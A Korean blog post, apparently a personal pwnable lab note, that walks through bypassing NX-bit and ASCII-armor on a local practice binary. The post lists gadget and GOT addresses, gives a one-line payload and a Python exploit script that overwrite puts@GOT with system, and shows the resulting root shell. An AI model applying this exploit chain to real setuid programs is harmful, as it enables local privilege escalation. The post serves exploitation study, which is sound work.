티스토리 뷰
나중을 대비하여.. Bypass Nx-Bit and ASCII-Armor 부분을 파이썬을 이용하여 짜봤음.
Fedora Core-13, ASLR은 꺼져있는 상태임.
system
-> 0x67bbf0
strcpy
-> 0x8048358
-> \x58\x83\x04\x08
puts
-> 0x08048388
-> \x88\x83\x04\x08
GOT_puts
-> 0x8049748
-> \x48\x97\x04\x08
pop2ret
-> 0x08048568
-> \x68\x85\x04\x08
0xf0
-> 0x80486ec
-> \xec\x86\x04\x08
0xbb
-> 0x8048753
-> \x53\x87\x04\x08
0x67
-> 0x8048754
-> \x54\x87\x04\x08
0x00
-> 0x80489ff
-> \xff\x89\x04\x08
/bin/sh
-> 0xbffffe87
-> \x87\xfe\xff\xbf
-> 최종 익스플로잇
/root/system/bypass-NX_and_ASCII/vuln $(python -c 'print "\x90" * 504 + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x48\x97\x04\x08" + "\xec\x86\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x49\x97\x04\x08" + "\x53\x87\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x4a\x97\x04\x08" + "\x54\x87\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x4b\x97\x04\x08" + "\x10\x97\x04\x08" + "\x88\x83\x04\x08" + "\x41\x41\x41\x41" + "\x49\xfe\xff\xbf"')
-> 테스트
bash# /root/system/bypass-NX_and_ASCII/vuln $(python -c 'print "\x90" * 504 + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x48\x97\x04\x08" + "\xec\x86\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x49\x97\x04\x08" + "\x53\x87\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x4a\x97\x04\x08" + "\x54\x87\x04\x08" + "\x58\x83\x04\x08" + "\x68\x85\x04\x08" + "\x4b\x97\x04\x08" + "\x10\x97\x04\x08" + "\x88\x83\x04\x08" + "\x41\x41\x41\x41" + "\x49\xfe\xff\xbf"')
buffer is XhH.XhISXhJTXhKAAAAIþÿ¿
sh-4.1#
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-> 익스플로잇에 성공, 이걸 파이썬으로 짜야 함
################################################
# exploit.py
"""
system
-> 0x67bbf0
strcpy
-> 0x8048358
puts
-> 0x8048388
GOT_puts
-> 0x8049748
pop2ret
-> 0x8048568
0xf0
-> 0x80486ec
0xbb
-> 0x8048753
0x67
-> 0x8048754
0x00
-> 0x80489ff
/bin/sh
-> 0xbffffe87
"""
import os
from struct import pack, unpack
p = lambda x : pack("<L", x)
#파이썬에 완전 무지하기 때문에 이 문법은 퍼왔음
#p(값)을 해주면 리틀엔디언으로 바꿔주는 역할을 해준다고 함
#ex) p(0x1234) = "\x34\x12"
strcpy = p(0x8048358)
puts_plt = p(0x8048388)
puts_got = [p(0x8049748), p(0x8049749), p(0x804974A), p(0x804974B)]
pop2ret = p(0x8048568)
_f0 = p(0x80486ec)
_bb = p(0x8048753)
_67 = p(0x8048754)
_00 = p(0x80489ff)
sh = p(0xbffffe49)
payload = ""
payload += "\x90" * 504
payload += strcpy
payload += pop2ret
payload += puts_got[0]
payload += _f0
payload += strcpy
payload += pop2ret
payload += puts_got[1]
payload += _bb
payload += strcpy
payload += pop2ret
payload += puts_got[2]
payload += _67
payload += strcpy
payload += pop2ret
payload += puts_got[3]
payload += _00
payload += puts_plt
payload += "\x90" * 4
payload += sh
print (payload)
################################################
bash# /root/system/bypass-NX_and_ASCII/vuln `python ./exploit.py`
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.1#
왜인지 system으로 sytem("./vuln" + payload)가 되지 않는다.
왜 그런지는 파이썬을 좀더 공부하는 걸로..
'Pwnable > Technique' 카테고리의 다른 글
| 문제풀이로 보는 Integer Overflow 기법 (0) | 2015.02.01 |
|---|---|
| mprotect() 함수 이용하여 Exploit하기 (0) | 2015.01.16 |
| Bypass NX-Bit and ASCII-Armor (15) | 2014.10.26 |
| FSB를 이용한 GOT_OVERWRITE (0) | 2014.10.02 |
| 간단한 GOT Overwrite (3) | 2014.10.02 |